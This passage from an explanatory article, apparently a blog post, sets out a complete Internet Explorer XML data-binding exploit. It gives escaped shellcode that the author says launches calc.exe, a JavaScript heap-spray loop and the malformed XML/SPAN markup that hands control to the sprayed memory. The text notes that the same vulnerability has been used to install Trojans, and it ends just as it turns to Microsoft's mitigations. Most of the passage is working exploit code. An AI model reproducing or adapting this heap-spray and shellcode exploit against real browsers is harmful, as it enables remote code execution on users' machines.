<script>

Now the program script itself; the shellcode object contains the machine code instructions to execute a process, running calc.exe.

Note, I have broken this line up for readability but you ought to ensure it is all one continuous line when pasting it into a text editor:

var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a
%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe
%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2
%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3
%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81
%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f
%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba
%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e
%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c
%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

The next piece of script code sprays the heap to push the memory address of the array onto it, in an effort to make it callable:

var spray = unescape("%u0a0a%u0a0a");

do {
   spray += spray;
} while(spray.length < 0xd0000);

memory = new Array();

for(i = 0; i < 100; i++)
   memory[i] = spray + shellcode;

And here is the exploit; the following XML tag is incorrectly handled in unpatched versions of Internet Explorer and will cause it to pass control to the memory address of the array, and therefore execute the program instructions it contains.

This too should be one continuous line in a text editor:

xmlcode = "<XML ID=I><X><C><![CDATA[<image
SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C>
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN></SPAN>";

tag = document.getElementById("replace");
tag.innerHTML = xmlcode;

</script>
</html>

Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.

Microsoft offer instructions how to mitigate the effectiveness of this vulnerability and in so doing indirectly espouse the Linux viewpoint on secure computing. Let me explain.

CONTINUED